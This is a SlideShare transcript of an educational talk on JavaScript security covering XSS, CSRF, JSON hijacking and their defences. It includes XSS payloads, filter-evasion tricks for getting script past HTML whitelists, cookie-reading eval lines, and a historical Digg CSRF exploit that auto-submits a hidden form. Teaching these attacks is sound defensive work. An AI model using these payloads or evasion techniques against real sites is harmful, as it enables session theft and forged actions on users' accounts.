JavaScript Security
Loading...
Flash Player 9 (or above) is needed to view presentations.
We have detected that you do not have it on your computer. To install it, go here.
11 Favorites
-
socbay, SD at HN,
favorited this 2 days ago
-
Jens Grochtdreis, Senior Frontend Developer at SinnerSchrader/Frankfurt, favorited this 6 days ago
-
jheijmannJohn Heijmann,
favorited this 1 week ago
-
Man mohan Singh, Web Designer
favorited this 9 months ago
-
Kumar S, Design Lead at nGIN,
favorited this 9 months ago
-
deibix
favorited this 2 years ago
-
shauvik, Student at Georgia Tech,
favorited this 2 years ago
-
Benny Kay, Network Admin at ITSEC Belgium, favorited this 2 years ago
-
xiefei
favorited this 2 years ago
-
oronm
favorited this 2 years ago
-
Manikanda Kumar, Software Engineer at Bangalore,
favorited this 2 years ago
JavaScript Security - Presentation Transcript
- JavaScript Security jason harwig
- \"How dangerous could this silly little toy scripting language running inside a browser be?\" Jeff Atwood codinghorror.com stackoverflow.com
- “JavaScript's biggest weakness is that it is not secure.” douglas crockford
- \".. nine out of 10 websites still have serious vulnerabilities. . (XSS) as the top vulnerability class\" WhiteHat Security Website Security Statistic Report
- OWASP Top 10 2007 1. XSS 6. Information Leakage 2. Injection Flaws 7. Broken Auth 3. File Exec 8. Insecure Crypto 4. Direct Object 9. Insecure Reference Communications 5. CSRF 10.Failure to restrict URL access
- browser limitations
- javascript IO • Ajax • Image • iFrame • Source script • Bridge to flash, Java applets
- var xhr = new XmlHttpRequest(); xhr.open(...)
- NIC Server Google * get or post
- var image = new Image(); image.src = url; * can detect connection success failure
- NIC Server Google * get requests only | onload | onerror
- f = document.createElement('iframe'); f.src = url; document.body.appendChild(f); * only if same domain
- NIC Server Google * get requests only
- s = document.createElement('script'); s.type = 'text/javascript'; s.src= url; document.body.appendChild(s); * if JSON returned
- NIC Server Google * get requests only
- f = document.createElement('form'); f.method = 'post'; ... f.submit();
- NIC Server Google * get or post
- white hat • Mashup / Aggregate content • SSO Solutions • Protect users / application integrity
- black hat • XSS • CSRF • JSON hi-jacking • Cookie session hijacking • Internal network scanning • History checking
- cross-site scripting
- Browser IFrame same origin policy
- user input escape it!
- XSS Flavors • Type 0 - DOM • Type 1 - Non-Persistant • Type 2 - Persistant
- type 0 var p = location.href.params; document.body.innerHTML = p
- Type 1 Search: <script>alert('xss');</script>
- Type 2 Please enter username: <script>alert('xss');</script>
- <c:out value=\"${var}\" Your Username: <script>alert('xss');</script> escapeXml=\"true\"/>
- html filtering
- samy is my hero from http://fast.info/myspace/
- Friend Requests 7,000 5,250 3,500 1,750 0 12:34pm 1:30am 8:35am 9:30am 10:30am 1:30pm
- tag/attribute whitelist <div style=\"background:url( 'javascript:alert('xss')' )\">
- 'javascript' stripped <div style=\"background:url( 'java\\nscript:alert('xss')' )\">
- \\\" stripped String.fromCharCode(34);
- innerHTML stripped eval('document.body.inne' + 'rHTML');
- onreadystatechange stripped eval('xmlhttp.onread' + 'ystatechange = callback');
- to be continued..
- alternatives to escaping?
- google caja / ADsafe
- attack vectors to prevent?
- code evaluation eval('alert(document.cookie)'); (new Function('alert(document.cookie)'))();
- code eval continued <iframe src=\"java�script:alert('xss')\"> </iframe>
- poluting global objects try { throw EvilArrayFunction; } catch (Array) { }
- xss lessons • Escape XML
- cross site request forgery the new kid
- NIC Server Google
- Digg.com • “digg” a story while logged in • Cookie authentication • known url, parameters
- digg exploit code mf = window.frames[\"myframe\"]; html = '<form name=\"diggform\" \\ action=\"http://digg.com/diginfull\" method=\"post\">'; html = html+'<input type=\"text\" name=\"id\" value=\"367034\"/>'; html = html+'<input type=\"text\" name=\"orderchange\" value=\"2\"/>'; html = html+'<input type=\"text\" name=\"category\" value=\"0\"/>'; html = html+'<input type=\"text\" name=\"page\" value=\"0\"/>'; html = html+'<input type=\"text\" name=\"t\" value=\"undefined\"/>'; html = html+'<input type=\"text\" name=\"row\" value=\"1\"/>'; html = html+'</form>'; mf.document.body.innerHTML = html; mf.document.diggform.submit(); from http://4diggers.blogspot.com/
- Fixes? • Referral checking? • quick cookie expiration? • post?
- solved session.setAttribute(\"token\", token); <input type=\"hidden\" value=\"${token}\"/>
- double submit cookie
- digg link <a href=\"javascript:dig([num],[id],[digCheck])\">digg it</a>
- digg submit js new Ajax.Request(\"/diginfull\", { \"method\": \"post\", \"parameters\": \"id=\" + itemd + \"&row=\" + row + \"&digcheck=\" + digcheck + \"&type=\" + type + \"&loc=\" + pagetype });
- no diggcheck, no digg
- digg.com • Added random hash as post parameter • server verifies request
- myspace • used hash in post to add friends • XSS vulnerable so the hash could be retrieved
- HDIV • HTTP Data Integrity Validator
- rsnake joins twitter
- crossdomain.xml <?xml version=\"1.0\" encoding=\"UTF-8\"?> <cross-domain-policy xmlns:xsi=\"http://www.w3.org/2001/ XMLSchema-instance\" xsi:noNamespaceSchemaLocation=\"http:// www.adobe.com/xml/schemas/PolicyFile.xsd\"> <allow-access-from domain=\"*.twitter.com\" /> <site-control permitted-cross-domain-policies=\"master-only\"/> <allow-http-request-headers-from domain=\"*.twitter.com\" headers=\"*\" secure=\"true\"/> </cross-domain-policy>
- http://www.yourminis.com/search_minis.aspx?q=XSS
- stealing your gmail contacts
- google contacts url contacts?out=js&callback=google
- responseText google ({ Success: true, Errors: [], Body: { Contacts: [ { id, email, etc. } ] } });
- google’s solution? • responseXml
- lessons • Protect high value forms • CANNOT be stopped if site is vulnerable to XSS
- json hijacking
- new Ajax.Request('secretStuff', { onSuccess: doWork }); // server responds with [ { sensitive_info: '...' }, { sensitive_info: '...' } ]
- So how do I do it? • Override Array • Source script
- demo
- solved /*-secure- [ { sensitive_info: '...' }, { sensitive_info: '...' } ] */
- “solved” continued • protect JSON services behind post
- lessons • Many experts recommend JSON services shouldn’t serve sensitive data • use secure comment • responseXml as alternative
- Session hijacking
- demo
- internal network penetration
- history hijack
- demo
- resources \"Security Now! Podcast\" \"Fortify\" twit.tv/sn fortifysoftware.com/security- resources/ \"WhiteHat Security\" whitehatsec.com \"XSS Generator\" ha.ckers.org/xss.html \"Jeremiah Grossman Blog\" jeremiahgrossman.blogspot.com \"Samy is my Hero\" fast.info/myspace \"Digg Hack\" 4diggers.blogspot.com \"HDIV\" hdiv.org
- twitter: jharwig jason.harwig@nearinfinity.com nearinfinity.com/blogs careers@nearinfinity.com 81
7710 views, 11 favs, more stats
JavaScript, as it is today, is an insecure language more
More Info
© All Rights Reserved
Go to text version- Total Views 7710
- 7426 on SlideShare
- Comments 0
- Favorites 11
- Downloads 292
Most viewed embeds
All embeds
- Uploaded via SlideShare
- Uploaded as Adobe PDF
0 comments
Post a comment